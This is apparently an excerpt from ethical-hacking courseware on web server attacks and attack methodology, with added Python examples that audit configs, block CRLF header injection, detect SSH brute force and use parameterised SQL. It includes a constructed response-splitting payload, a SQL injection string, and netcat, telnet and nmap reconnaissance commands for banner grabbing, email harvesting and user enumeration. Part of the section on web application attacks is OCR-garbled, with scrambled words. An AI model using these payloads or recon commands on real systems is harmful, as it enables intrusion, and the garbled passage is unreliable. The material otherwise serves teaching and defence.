Attackers perform a phishing attack by sending an email containing a malicious link and tricking the user into clicking it. Clicking the link will redirect the user to a fake website that appears similar to the legitimate website. Attackers create such websites by hosting their address on servers. When a victim clicks on the malicious web link while believing the link to be a legitimate website address, the victim is redirected to the malicious website hosted on the attacker's server. The website prompts the user to enter sensitive information, such as usernames, passwords, bank account details, and social security numbers, and divulges the data to the attacker. Later, the attacker may be able to establish a session with the legitimate website by using the victim's stolen credentials to perform malicious operations on the target legitimate website.
Figure 13.12: Phishing attacks
Website Defacement
Website defacement refers to unauthorized changes made to the content of a single web page or an entire website, resulting in changes to the visual appearance of the web page or website. Hackers break into web servers and alter the hosted website by injecting code to add images, popups, or text to a page in such a manner that the visual appearance of the page changes. In some cases, the attacker may replace the entire website instead of just changing a single page.

Figure 13.12: Screenshot displaying a website defacement attack
Defaced pages expose visitors to propaganda or misleading information until the unauthorized changes are discovered and corrected. Attackers use a variety of methods, such as MySQL injection, to access a website to deface it. In addition to changing the visual appearance of the target website, attackers deface websites for infecting the computers of visitors by making the website vulnerable to virus attacks. Thus, website defacement not only embarrasses the target organization by changing the appearance of its website but is also intended to harm its visitors.

Web Server Misconfiguration
Web server misconfiguration refers to the configuration weaknesses in web infrastructure that can be exploited to launch various attacks on web servers, such as directory traversal, server intrusion, and data theft. The following are some web server misconfigurations:
▪ Verbose debug/error messages
▪ Anonymous or default users/passwords
▪ Sample configuration and script files
▪ Remote administration functions
▪ Unnecessary services enabled
▪ Misconfigured/default SSL certificates

An Example of a Web Server Misconfiguration
“Keeping the server configuration secure requires vigilance” (Open Web Application Security Project (OWASP))
Administrators who configure web servers improperly may leave serious loopholes in the web server, thereby providing an attacker the chance to exploit the misconfigured web server to compromise its security and obtain sensitive information. The vulnerabilities of improperly configured web servers may be related to configuration, applications, files, scripts, or web pages. An attacker searches for such vulnerable web servers to launch attacks. The misconfiguration of a web server provides the attacker a path to enter the target network of an organization. These loopholes in the server can also help an attacker bypass user

authentication. Once detected, these problems can be easily exploited and may result in the total compromise of a website hosted on the target web server. As shown in the below figure, the configuration may allow anyone to view the server status page, which contains detailed information about the current use of the web server, including information about the current hosts and requests being processed.

Figure 13.14: Screenshot displaying the httpd.conf file on an Apache server

As shown in the below figure, the configuration may give verbose error messages.

display_error = on

log_errors = On

error_log = syslog

Figure 13.15: Screenshot displaying the php.ini file
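The two screenshots above show the weak settings without their corrected form. The following is an added example (not courseware code) that puts each weak fragment beside its hardened counterpart and audits them: a php.ini fragment for error display, and an Apache 2.4 httpd.conf fragment for the /server-status page. The config fragments are constructed; the directive is spelled display_errors in PHP itself, and the checked expectations are the assumptions encoded in PHP_RULES.

```python
"""Added example: auditing PHP error display and the Apache server-status page."""
import re
from typing import Dict, List

# Constructed php.ini fragment reproducing the weak setting in the screenshot.
WEAK_PHP_INI = """
display_errors = On
log_errors = On
error_log = syslog
"""

# Same fragment, hardened: errors go to the log, never to the client.
HARDENED_PHP_INI = """
display_errors = Off      ; never show errors to clients
log_errors = On           ; keep them in the server log instead
error_log = syslog
"""

# Constructed httpd.conf fragments (Apache 2.4 "Require" access-control syntax).
WEAK_HTTPD_CONF = """
<Location "/server-status">
    SetHandler server-status
    Require all granted
</Location>
"""

HARDENED_HTTPD_CONF = """
<Location "/server-status">
    SetHandler server-status
    Require ip 127.0.0.1 10.0.0.0/8
</Location>
"""

# Assumed expectations: directive -> (required value, why it matters)
PHP_RULES = {
    "display_errors": ("off", "verbose PHP errors are shown to every client"),
    "log_errors": ("on", "errors should still be recorded for the administrator"),
}


def parse_ini(text: str) -> Dict[str, str]:
    """Minimal key = value parser; ';' starts a comment, as in php.ini."""
    settings: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()
        if "=" in line:
            key, value = line.split("=", 1)
            settings[key.strip().lower()] = value.strip().strip('"').lower()
    return settings


def audit_php_ini(text: str) -> List[str]:
    """Return one finding per directive that deviates from PHP_RULES."""
    settings = parse_ini(text)
    findings = []
    for key, (expected, why) in PHP_RULES.items():
        actual = settings.get(key, "<unset>")
        if actual != expected:
            findings.append(f"{key}={actual}, expected {expected}: {why}")
    return findings


def audit_server_status(conf: str) -> List[str]:
    """Flag a /server-status location that any client may read."""
    block = re.search(r'<Location\s+"?/server-status"?\s*>(.*?)</Location>',
                      conf, re.S | re.I)
    if not block:
        return []  # handler not exposed at all
    body = block.group(1)
    open_to_all = re.search(r"\bRequire\s+all\s+granted\b", body, re.I)
    no_restriction = not re.search(r"\bRequire\b", body, re.I)
    if open_to_all or no_restriction:
        return ["/server-status is reachable without an IP restriction"]
    return []


if __name__ == "__main__":
    for label, text in [("weak php.ini", WEAK_PHP_INI), ("hardened php.ini", HARDENED_PHP_INI)]:
        print(label, audit_php_ini(text) or "ok")
    for label, text in [("weak httpd.conf", WEAK_HTTPD_CONF), ("hardened httpd.conf", HARDENED_HTTPD_CONF)]:
        print(label, audit_server_status(text) or "ok")
```

The php.ini check only reads the file on disk; a .htaccess file or ini_set() call in application code can still turn display_errors back on, so the value seen at runtime (for example via phpinfo on a non-production host) is what to verify.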

HTTP Response-Splitting Attack
An HTTP response-splitting attack is a web-based attack in which the attacker tricks the server by injecting new lines into response headers, along with arbitrary code. It involves adding header response data into the input field so that the server splits the response into two responses. This type of attack exploits vulnerabilities in input validation. Cross-site scripting (XSS), cross-site request forgery (CSRF), and Structured Query Language (SQL) injection are examples of this type of attack. In this attack, the attacker controls the input parameter and cleverly constructs a request header that elicits two responses from the server. The attacker alters a single request to appear as two requests by adding header response data into the input field. The web server, in turn, responds to each request. The attacker can pass malicious data to a vulnerable application, and the application includes the data in an HTTP response header. The attacker can control the first response to redirect the user to a malicious website, whereas the web browser will discard other responses.

Figure 13.16: HTTP response-splitting attack

Example of an HTTP Response-Splitting Attack
In this example, the attacker sends a response-splitting request to the web server. The server splits the response into two and sends the first response to the attacker and the second response to the victim. After receiving the response from the web server, the victim requests service by providing credentials. Simultaneously, the attacker requests for the index page. Subsequently, the web server sends the response to the victim's request to the attacker, and the victim remains uninformed.

Figure 13.17: Example of an HTTP response-splitting attack
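The text explains that the split happens because the application copies attacker-controlled data into a response header. The following added example (illustrative code, not from the courseware or any framework) renders a redirect the vulnerable way, counts how many responses a downstream parser would see in the bytes, and shows the input check that prevents it; the redirect URLs are constructed and the function names are assumptions.

```python
"""Added example: how a CR/LF in a header value yields two responses, and the check that stops it."""
import re

# Constructed value for the redirect parameter, carrying an embedded CR LF so
# that a second, attacker-written response follows the first (the pattern the
# text describes).
SPLIT_VALUE = (
    "https://example.com/\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 17\r\n"
    "\r\n"
    "<h1>injected</h1>"
)
BENIGN_VALUE = "https://example.com/account"


def render_redirect(location: str) -> bytes:
    """Vulnerable pattern: the untrusted value is copied into the header verbatim."""
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {location}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


def safe_header_value(value: str) -> str:
    """Reject any header value containing CR, LF or NUL.

    Run this on the decoded string: web frameworks URL-decode %0d%0a before
    the value reaches header construction, so inspecting the raw query
    string is not sufficient.
    """
    if re.search(r"[\r\n\x00]", value):
        raise ValueError("control characters are not allowed in header values")
    return value


def render_redirect_safe(location: str) -> bytes:
    """Hardened form: validate first, then render."""
    return render_redirect(safe_header_value(location))


def count_responses(raw: bytes) -> int:
    """How many HTTP responses a downstream parser (proxy, cache, browser) sees."""
    return len(re.findall(rb"(?m)^HTTP/1\.[01] \d{3} ", raw))


def accepts(location: str) -> bool:
    """True if the hardened renderer accepts the value, False if it rejects it."""
    try:
        render_redirect_safe(location)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print("benign value ->", count_responses(render_redirect(BENIGN_VALUE)), "response(s)")
    print("split value  ->", count_responses(render_redirect(SPLIT_VALUE)), "response(s)")
    print("hardened renderer accepts split value:", accepts(SPLIT_VALUE))
```

Most current web frameworks apply this check inside their header-setting API, which is why response splitting mostly survives in hand-built header strings; the second response is also what a shared cache stores in the web cache poisoning attack described next.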
Web Cache Poisoning Attack
Web cache poisoning damages the reliability of an intermediate web cache source. In this attack, an attacker swaps cached content for a random URL with infected content. Users of the web cache source may unknowingly use the poisoned content instead of the true and secured content when requesting the required URL through the web cache. An attacker forces the web server's cache to flush its actual cache content and sends a specially crafted request to store in the cache. In this case, all the users of that web server cache will receive malicious content until the servers flush the web cache. Web cache poisoning attacks are possible if the web server and application have HTTP response-splitting flaws.

Figure 13.18: Web cache poisoning attack
SSH Brute Force Attack
Attackers use SSH protocols to create an encrypted SSH tunnel between two hosts to transfer unencrypted data over an insecure network. Usually, SSH runs on TCP port 22. To perform an attack on SSH, an attacker scans the entire SSH server using bots (performs a port scan on TCP port 22) to identify possible vulnerabilities. With the help of a brute-force attack, the attacker obtains login credentials to gain unauthorized access to an SSH tunnel. An attacker who obtains the login credentials of SSH can use the same SSH tunnels to transmit malware and other means of exploitation to victims without being detected. Attackers use tools such as Nmap and Ncrack on a Linux platform to perform an SSH brute-force attack.

Figure 13.19: SSH brute force attack
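A brute-force attempt against sshd leaves a distinctive trail: many "Failed password" lines from one source in a short time, often cycling through usernames. The following added example (not courseware code) implements that detection over a constructed auth.log excerpt in OpenSSH's log format; the hostnames, PIDs, documentation IP addresses, the assumed log year, and the threshold and window values are all constructed or assumed.

```python
"""Added example: detecting an SSH brute-force attempt from sshd log lines."""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List

# Constructed auth.log excerpt (OpenSSH format, RFC 5737 addresses, fake PIDs).
SAMPLE_AUTH_LOG: List[str] = """\
Mar  3 10:15:01 web01 sshd[2210]: Failed password for invalid user admin from 203.0.113.45 port 51822 ssh2
Mar  3 10:15:03 web01 sshd[2212]: Failed password for root from 203.0.113.45 port 51830 ssh2
Mar  3 10:15:06 web01 sshd[2214]: Failed password for root from 203.0.113.45 port 51838 ssh2
Mar  3 10:15:09 web01 sshd[2216]: Failed password for invalid user test from 203.0.113.45 port 51846 ssh2
Mar  3 10:15:12 web01 sshd[2218]: Failed password for invalid user admin from 203.0.113.45 port 51852 ssh2
Mar  3 10:15:15 web01 sshd[2220]: Failed password for root from 203.0.113.45 port 51860 ssh2
Mar  3 10:20:41 web01 sshd[2290]: Failed password for deploy from 198.51.100.8 port 40100 ssh2
Mar  3 10:20:55 web01 sshd[2292]: Accepted password for deploy from 198.51.100.8 port 40102 ssh2
Mar  3 11:02:13 web01 sshd[2410]: Failed password for deploy from 198.51.100.8 port 40310 ssh2
""".splitlines()

FAILED_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

LOG_YEAR = 2024  # syslog timestamps carry no year; assumed for the constructed sample


def parse_timestamp(mon: str, day: str, time: str) -> datetime:
    return datetime.strptime(f"{LOG_YEAR} {mon} {day} {time}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(lines: List[str], threshold: int = 5,
                      window_s: int = 60) -> Dict[str, Dict]:
    """Flag source IPs with >= threshold failed logins inside any window_s span.

    A sliding window over the sorted failure times avoids flagging a legitimate
    user who mistypes a password a few times over an hour.
    """
    failures = defaultdict(list)
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            ts = parse_timestamp(m.group("mon"), m.group("day"), m.group("time"))
            failures[m.group("ip")].append((ts, m.group("user")))

    alerts: Dict[str, Dict] = {}
    for ip, events in failures.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while (events[end][0] - events[start][0]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                alerts[ip] = {
                    "failures": len(events),
                    "users": sorted({user for _, user in events}),
                }
                break
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(f"{ip}: {info['failures']} failed logins, usernames tried: {', '.join(info['users'])}")
```

An alert like this is what fail2ban-style tools act on by adding a temporary firewall rule; disabling password authentication in sshd_config (PasswordAuthentication no) in favour of keys removes the guessing target altogether.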
Web Server Password Cracking
An attacker attempts to exploit weaknesses to hack well-chosen passwords. The most common passwords found are password, root, administrator, admin, demo, test, guest, qwerty, pet names, and so on. The attacker mainly targets the following through web server password cracking:
▪ SMTP and FTP servers
▪ Web shares
▪ SSH tunnels
▪ Web form authentication
Attackers use different methods such as social engineering, spoofing, phishing, a Trojan horse or virus, wiretapping, and keystroke logging to perform web server password cracking. In many hacking attempts, the attacker starts with password cracking to prove to the web server that they are a valid user.

Web Server Password Cracking Techniques
Password cracking is the most common method of gaining unauthorized access to a web server by exploiting flawed and weak authentication mechanisms. Once the password is cracked, an attacker can use the password to launch further attacks. We present some details of various tools and techniques used by attackers to crack passwords. Attackers can use password cracking techniques to extract passwords from web servers, FTP servers, SMTP servers, and so on. They can crack passwords either manually or with automated tools such as THC Hydra, Ncrack, and RainbowCrack.

The following are some techniques attackers use to crack passwords:
▪ Guessing: This is the most common method of cracking passwords. In this method, the attacker guesses possible passwords either manually or by using automated tools provided with dictionaries. Most people tend to use their pets' names, loved ones' names, license plate numbers, dates of birth, or other weak passwords such as “QWERTY,” “password,” “admin,” etc. so that they can remember them easily. The attacker exploits this human behavior to crack passwords.
▪ Dictionary attack: A dictionary attack uses a predefined file containing various combinations of words, and an automated program enters these words one at a time to check if any of them are the password. This might not be effective if the password includes special characters and symbols. If the password is a simple word, then it can be found quickly. Compared to a brute-force attack, a dictionary attack is less time consuming.
▪ Brute-force attack: In the brute-force method, all possible character combinations are tested; for example, the test may include combinations of uppercase characters from A to Z, numbers from 0 to 9, and lowercase characters from a to z. This method is useful for identifying one-word or two-word passwords. If a password consists of uppercase and lowercase letters as well as special characters, it might take months or years to crack the password using a brute-force attack.
▪ Hybrid attack: A hybrid attack is more powerful than the above techniques because it uses both a dictionary attack and brute-force attack. It also uses symbols and numbers. Password cracking is easier with this method than with the above methods.

Server-Side Request Forgery (SSRF) Attack


Attackers exploit server-side request forgery (SSRF) vulnerabilities, which evolve from the unsafe use of functions in an application, in public web servers to send crafted requests to the internal or backend servers. Internal servers are usually protected by firewalls to prevent unwanted traffic inflows into the network. Therefore, attackers leverage SSRF vulnerabilities in Internet-facing web servers to gain access to the backend servers that are protected by a firewall. The backend server believes that the request is made by the web server because they are on the same network and responds with the data stored in it.

Generally, server-side requests are initiated to obtain information from an external resource and feed it into an application. For instance, a designer can utilize a URL such as https://xyz.com/feed.php?url=externalsite.com/feed/ to obtain a remote feed. If attackers can alter the URL input to the localhost, then they can view all the local resources on the server. This is how SSRF vulnerabilities evolve.

Once the attack is successfully performed, attackers can perform various activities such as port scanning, network scanning, IP address discovery, reading of web server files, bypassing of host-based authentication, interaction with critical protocols, and remote code execution.

Figure 13.20: Demonstration of SSRF attack

Web Application Attacks
Even if web servers are configured securely or are secured using network security measures such as firewalls, a poorly coded web application deployed on the web server may provide a path for an attacker to compromise the web server's security. If web developers do not adopt secure coding practices while developing web applications, attackers may be able to exploit vulnerabilities and compromise web applications and web server security. An attacker can perform different types of attacks on vulnerable web applications to breach web server security.
▪ Parameter/Form Tampering: In this type of tampering attack, the attacker manipulates the parameters exchanged between the client and server to modify application data, such as user credentials and permissions as well as the price and quantity of products.
▪ Cookie Tampering: Cookie-tampering attacks occur when a cookie is sent from the client side to the server. Different types of tools help in modifying persistent and non-persistent cookies.
▪ Unvalidated Input and File Injection Attacks: Unvalidated input and file-injection attacks are performed by supplying an unvalidated input or by injecting files into a web application.
▪ Session Hijacking: Session hijacking is an attack in which the attacker exploits, steals, predicts, and negotiates the real valid web session's control mechanism to access the authenticated parts of a web application.
▪ SQL Injection Attacks: SQL injection exploits the security vulnerability of a database for attacks. The attacker injects malicious code into the strings, which are later passed on to the SQL server for execution.

ical andCountermensores
Mackin ©by E-Comel
Copyright
traversal is the exploitation
Traversal:Directory
Directory of HTTPthrough
which
attackerscan access restricteddirectoriesand execute commands
outsideof the web
root directory
server's bymanipulating
(DoS)
Denial-of-Service
aURL.
Attack:A DoSattackis intendedto terminate the operations
of
website or server
‘a to makeit unavailable
for access byits intendedusers
Scripting
Cross-Site (SS)Attacks:In this method,
an attacker
injectsHTMLtagsor
scripts
into a targetwebsite.
BufferOverflowAttacks:Thedesign of most web applications
helps themi n sustaining
some amount of data. If that amount exceedsthe storagespaceavailable, the
application
advantage
may crashor exhibitsome other
andfloodsthe application
overflowattack.
vulnerable
behavior.An attackeruses this
with an excess amount of data,causinga buffer

Cross-SiteRequest (CSRF)
Forgery Attack: An attacker exploits
the trust of an

user
authenticated to
CommandInjection
passcode toweb
malicious or commands the
Attacks:In this typeof attack,
server.
a hackeraltersthe content of the
web page byusing HTML code and by identifying the form fields that lack valid
constraints,
SourceCodeDisclosure: Source-code disclosureis a resultof typographical errors i n
scriptsor misconfiguration,
suchas failureto grantexecutablepermissionsto a scriptor
directory. disclosurecan occasionally
Source-code allow attackersto access sensitive
informationaboutdatabasecredentials
andsecret keys to compromise the webserver.

ical andCountermensores
Mackin ©by E-Comel
Copyright
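Parameter/form tampering and SQL injection are the two items in the list above that a developer can shut down in application code. The following Python example is added here and is not from the EC-Council courseware: it contrasts a vulnerable order handler with a hardened one over a constructed in-memory SQLite catalogue. The product SKUs, prices, and the `form` dictionary shape are assumptions made for the demonstration.

```python
"""Vulnerable vs. hardened handling of a product order.

Constructed example (not from the EC-Council courseware). It demonstrates
the two attacks from the list above that a server can defend against in
code, parameter/form tampering and SQL injection, using an in-memory SQLite
catalogue. Product data and prices are made up.
"""
import sqlite3


def make_catalogue() -> sqlite3.Connection:
    """Create a constructed in-memory product table (sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (sku TEXT PRIMARY KEY, price_cents INTEGER)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?)",
        [("BOOK-1", 2500), ("PEN-2", 300)],
    )
    conn.commit()
    return conn


def vulnerable_order_total(conn, form: dict) -> int:
    """Trusts the client-supplied price and builds SQL by string concatenation.

    Both are defects: the price is whatever the client sent (form tampering),
    and the sku is pasted straight into the query (SQL injection).
    """
    query = "SELECT sku FROM products WHERE sku = '" + form["sku"] + "'"
    row = conn.execute(query).fetchone()
    if row is None:
        raise ValueError("unknown product")
    return int(form["price_cents"]) * int(form["qty"])


def hardened_order_total(conn, form: dict) -> int:
    """Looks up the price server-side and uses a parameterised query.

    Only sku and qty are read from the form; qty is validated as a small
    positive integer. The price comes from the catalogue, so a tampered
    'price_cents' field has no effect, and the sku is bound as a parameter,
    so it can only ever be compared as a literal value.
    """
    sku = form.get("sku", "")
    try:
        qty = int(form.get("qty", "0"))
    except ValueError as exc:
        raise ValueError("qty must be an integer") from exc
    if not 1 <= qty <= 100:
        raise ValueError("qty out of range")
    row = conn.execute(
        "SELECT price_cents FROM products WHERE sku = ?", (sku,)
    ).fetchone()
    if row is None:
        raise ValueError("unknown product")
    return row[0] * qty


if __name__ == "__main__":
    catalogue = make_catalogue()
    tampered = {"sku": "BOOK-1", "price_cents": "1", "qty": "2"}
    print("vulnerable total:", vulnerable_order_total(catalogue, tampered))
    print("hardened total:  ", hardened_order_total(catalogue, tampered))
```

With the tampered form the vulnerable handler charges 2 cents for two books while the hardened one charges the catalogue price; with a SKU of `' OR '1'='1` the concatenated query matches every row, whereas the bound parameter matches nothing and the order is rejected.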
Module Flow

Web Server Concepts; Web Server Attacks; Web Server Attack Methodology; Countermeasures; Patch Management; Web Server Security Tools

Web Server Attack Methodology

Stages: Information Gathering; Web Server Footprinting; Website Mirroring; Vulnerability Scanning; Session Hijacking; Web Server Password Hacking

The previous section described attacks that an attacker can perform to compromise a web server's security. This section explains how the attacker proceeds towards performing a successful attack on a web server. A web server attack typically involves preplanned activities called an attack methodology that an attacker follows to reach the goal of breaching the target web server's security.

Attackers hack a web server in multiple stages. At each stage, the attacker attempts to gather information about loopholes and to gain unauthorized access to the web server. The following are the various stages of the attack methodology for web servers:

▪ Information Gathering: Every attacker tries to collect as much information as possible about the target web server. The attacker gathers the information and then analyzes it to find lapses in the current security mechanisms of the web server.
▪ Web Server Footprinting: The purpose of footprinting is to gather information about the security aspects of a web server with the help of tools or footprinting techniques. Through footprinting, attackers can determine the web server's remote access capabilities, its ports and services, and other aspects of its security.
▪ Website Mirroring: Website mirroring is a method of copying a website and its content onto another server for offline browsing. With a mirrored website, an attacker can view the detailed structure of the website.
▪ Vulnerability Scanning: Vulnerability scanning is a method of finding the vulnerabilities and misconfigurations of a web server. Attackers scan for vulnerabilities with the help of automated tools known as vulnerability scanners.
▪ Session Hijacking: Attackers can perform session hijacking after identifying the current session of the client. The attacker takes complete control over the user session through session hijacking.
▪ Hacking Web Server Passwords: Attackers use password-cracking methods such as brute-force attacks, hybrid attacks, and dictionary attacks to crack the web server's password.
Information Gathering

Information gathering is the first and one of the most important steps toward hacking a target web server. In this step, an attacker collects as much information as possible about the target web server by using various tools and techniques. The information obtained from this step helps the attacker in assessing the security posture of the web server. Attackers may search the Internet, newsgroups, bulletin boards, and so on for gathering information about the target organization. Attackers can use tools such as Whois.net and Whois Lookup to extract information such as the target's domain name, IP address, and autonomous system number.

▪ WHOis.net
Source: https://www.whois.net
WHOis.net is designed to help users perform a variety of whois functions. It lets the user perform a domain whois search, whois IP lookup, and whois database search for relevant information on domain registration and availability. It provides insight into a domain's history and additional information. The whois lookup can be used anytime to determine who owns a domain name, how many pages from a site are listed with Google, or even search whois address listings for a website's owner.
Figure 13.21: Screenshot displaying a WHOis.net search result

The following are some additional online information-gathering tools:
▪ Whois Lookup (https://whois.domaintools.com)
▪ Whois (https://www.whois.com)
▪ DNSstuff WHOIS/IPWHOIS Lookup (https://tools.dnsstuff.com)
▪ Domain Dossier (https://centralops.net)
▪ Find Subdomains (https://pentest-tools.com)

Note: For complete coverage of information-gathering techniques, refer to Module 02: Footprinting and Reconnaissance.
Information Gathering from Robots.txt File

The robots.txt file contains the list of the web server directories and files that the website owner wants to hide from web crawlers. An attacker can simply request the robots.txt file from the URL and retrieve sensitive information, such as the root directory structure and content management system information, about the target website.

A website owner creates a robots.txt file to list the files or directories a web crawler should index for providing search results. Poorly written robots.txt files can cause the complete indexing of website files and directories. If confidential files and directories are indexed, an attacker may easily obtain information such as passwords, email addresses, hidden links, and membership areas.

If the owner of the target website writes the robots.txt file without allowing the indexing of restricted pages for providing search results, an attacker can still view the robots.txt file of the site to discover restricted files and then view them to gather information. An attacker types URL/robots.txt in the address bar of a browser to view the target website's robots.txt file. An attacker can also download the robots.txt file of a target website using the Wget tool.
User-agent: *
Disallow: /*/security/search-results.aspx?
Disallow: /*/music/*/search/
Disallow: /*/search/
Disallow: /*/newsearch/
Allow: /*/store/*/search/
Allow: /*/store/*/layout/
(further Allow and Disallow rules for catalog and accessory search pages)

Figure 13.22: Screenshot displaying a robots.txt file
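The section above recommends reading a site's robots.txt for the directories it tries to hide, and the screenshot shows how long such a file can get. The following Python parser is an added example, not from the courseware or from any robots.txt library: it splits the file into User-agent groups, lists every path a Disallow rule names, and flags the ones whose names suggest the rule is standing in for access control, which is the review a site owner should do before an attacker does it. SAMPLE_ROBOTS is a constructed file loosely modelled on the search rules in the screenshot, and the SENSITIVE_HINTS list is an assumption.

```python
"""Audit what a robots.txt file reveals.

Added example (not part of the EC-Council courseware): parses a robots.txt
file the way a crawler would (User-agent groups, Allow/Disallow rules),
reports the paths that Disallow rules point at, and flags the ones that look
like they are hiding something sensitive. Hiding a path from crawlers does
not protect it: robots.txt is public, so each listed path still needs
authentication or removal.
"""

# Constructed sample, loosely modelled on the search rules in the screenshot.
SAMPLE_ROBOTS = """\
# constructed sample robots.txt
User-agent: *
Disallow: /*/search/
Disallow: /admin/
Disallow: /backup/db-export.sql
Allow: /*/store/*/search/

User-agent: Googlebot
Disallow: /staging/
"""

# Assumption: substrings that usually mean a path should not be public at all.
SENSITIVE_HINTS = ("admin", "backup", "staging", "private", ".sql", ".bak", "config")


def parse_robots(text: str) -> dict:
    """Return {user_agent: [(directive, path), ...]} from robots.txt text.

    Rules before any User-agent line are ignored, as crawlers ignore them.
    Comments (#) and blank lines are skipped; directive names are
    case-insensitive. Consecutive User-agent lines share one rule group.
    """
    groups: dict = {}
    current = []       # user-agents the next rules apply to
    saw_rule = False   # set once a rule follows the current agents
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        field = field.lower()
        if field == "user-agent":
            if saw_rule:   # a new group starts after rules were seen
                current = []
                saw_rule = False
            current.append(value)
            groups.setdefault(value, [])
        elif field in ("allow", "disallow"):
            saw_rule = True
            for agent in current:
                groups[agent].append((field, value))
    return groups


def disallowed_paths(groups: dict) -> list:
    """Every distinct path that some Disallow rule hides from crawlers."""
    paths = []
    for rules in groups.values():
        for directive, path in rules:
            if directive == "disallow" and path and path not in paths:
                paths.append(path)
    return paths


def flag_sensitive(paths: list) -> list:
    """Paths whose name suggests the Disallow rule is hiding something sensitive."""
    return [p for p in paths if any(h in p.lower() for h in SENSITIVE_HINTS)]


if __name__ == "__main__":
    for path in flag_sensitive(disallowed_paths(parse_robots(SAMPLE_ROBOTS))):
        print("review:", path)
```

Run against the sample, the parser reports `/admin/`, `/backup/db-export.sql`, and `/staging/` for review; the search-page rules are ordinary crawl hints and are left alone.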
Web Server Footprinting/Banner Grabbing

By performing web server footprinting, an attacker can gather valuable system-level data such as account details, OSs, software versions, server names, and database schema details. The Telnet utility can be used to footprint a web server and gather information such as server name, server type, OSs, and running applications. Furthermore, footprinting tools such as Netcraft, ID Serve, and httprecon can be used to perform web server footprinting. These footprinting tools can extract information from the target server. Here, we examine the features and types of information these tools can collect from the target server.
Web Server Footprinting Tools

▪ Netcraft
Source: https://www.netcraft.com
Netcraft determines the OS of the queried host by examining in detail the network characteristics of the HTTP response received from the website. Netcraft identifies vulnerabilities in the web server via indirect methods; the fingerprinting of the OS, installed software, and configuration of that software yields sufficient information to determine whether the server is vulnerable to an exploit.

Figure 13.23: Screenshot of Netcraft

▪ Netcat
Source: http://netcat.sourceforge.net
Netcat is a networking utility that reads and writes data across network connections by using the TCP/IP protocol. It is a reliable "back-end" tool used directly or driven by other programs and scripts. It is also a network debugging and exploration tool. The following are the commands used to perform banner grabbing for www.moviescope.com as an example to gather information such as server type and version:
  ○ # nc -vv www.moviescope.com 80 [press Enter]
  ○ GET / HTTP/1.0 [press Enter twice]
Server identified as Microsoft-IIS/10.0

Figure 13.24: Netcat output

▪ Telnet
Source: https://docs.microsoft.com
Telnet is a client-server network protocol that is widely used on the Internet or LANs. It provides login sessions for a user on the Internet. A single terminal attached to another computer emulates the session by using Telnet. The primary security issues with Telnet are the following:
  ○ It does not encrypt data sent through the connection.
  ○ It lacks an authentication scheme.
Telnet enables an attacker to perform a banner-grabbing attack. It probes HTTP servers to determine the Server field in the HTTP response header. For instance, the following procedure is utilized to enumerate a host running on HTTP (TCP 80):
  ○ Request Telnet to connect to a host on a specific port with the command # telnet www.moviescope.com 80 and press Enter. A blank screen appears.
  ○ Type GET / HTTP/1.0 and press Enter twice. The HTTP server responds with the information shown in the screenshot.
Server identified as Microsoft-IIS/10.0

Figure 13.25: Telnet output

▪ httprecon
Source: https://www.computec.ch
httprecon is a tool for advanced web server fingerprinting. This tool performs banner-grabbing attacks, status code enumeration, and header ordering analysis on the target web server and provides accurate web server fingerprinting information. httprecon performs the following header analysis test cases on the target web server:
  ○ A legitimate GET request for an existing resource
  ○ An exceedingly long GET request (a Uniform Resource Identifier (URI) of >1024 bytes)
  ○ A common GET request for a non-existing resource
  ○ A common HEAD request for an existing resource
  ○ Enumeration with OPTIONS, which is allowed
  ○ The HTTP method DELETE, which is usually not permitted
  ○ The HTTP method TEST, which is not defined
  ○ The protocol version HTTP/9.8, which does not exist
  ○ A GET request including attack patterns (e.g., ../ and %%)

Figure 13.26: Screenshot of httprecon

▪ ID Serve

Source: https://www.grc.com
ID Serve is a simple Internet server identification utility. The following is a list of its capabilities:
  ○ HTTP Server Identification: ID Serve can identify the make, model, and version of a website's server software. ID Serve sends this information in the preamble of replies to web queries, but the information is not visible to the user.
  ○ Non-HTTP Server Identification: Most non-HTTP (non-web) Internet servers (e.g., FTP, SMTP, Post Office Protocol (POP), and NEWS) are required to transmit a line containing a numeric status code and a human-readable greeting to any connecting client. Therefore, ID Serve can also connect with non-web servers to receive and report the server's greeting message. This generally reveals the server's make, model, version, and other potentially useful information.
  ○ Reverse DNS Lookup: When ID Serve users enter a site's or server's domain name or URL, the application will use DNS to determine the IP address of that domain. However, it is occasionally useful to proceed in the other direction to determine the domain name associated with a known IP address. This process, known as reverse DNS lookup, is also built into ID Serve. ID Serve attempts to determine the associated domain name for any entered IP address.

Figure 13.27: Screenshot of ID Serve

The following are some additional footprinting tools:
▪ Recon-ng (https://github.com)
▪ Uniscan (https://sourceforge.net)
▪ Nmap (https://nmap.org)
▪ GhostEye (https://github.com)
▪ Skipfish (https://code.google.com)
Enumerating Web Server Information Using Nmap

Source: https://nmap.org
Nmap, along with the Nmap Scripting Engine (NSE), can extract a large amount of valuable information from the target web server. In addition to Nmap commands, NSE provides scripts that reveal various types of useful information about the target server to an attacker. An attacker uses the following Nmap commands and NSE scripts to extract information:

▪ Discover virtual domains with hostmap:
  $ nmap --script hostmap <host>
▪ Detect a vulnerable server that uses the TRACE method:
  nmap --script http-trace -p80 localhost
▪ Harvest email accounts with http-google-email:
  $ nmap --script http-google-email <host>
▪ Enumerate users with http-userdir-enum:
  nmap -p80 --script http-userdir-enum localhost
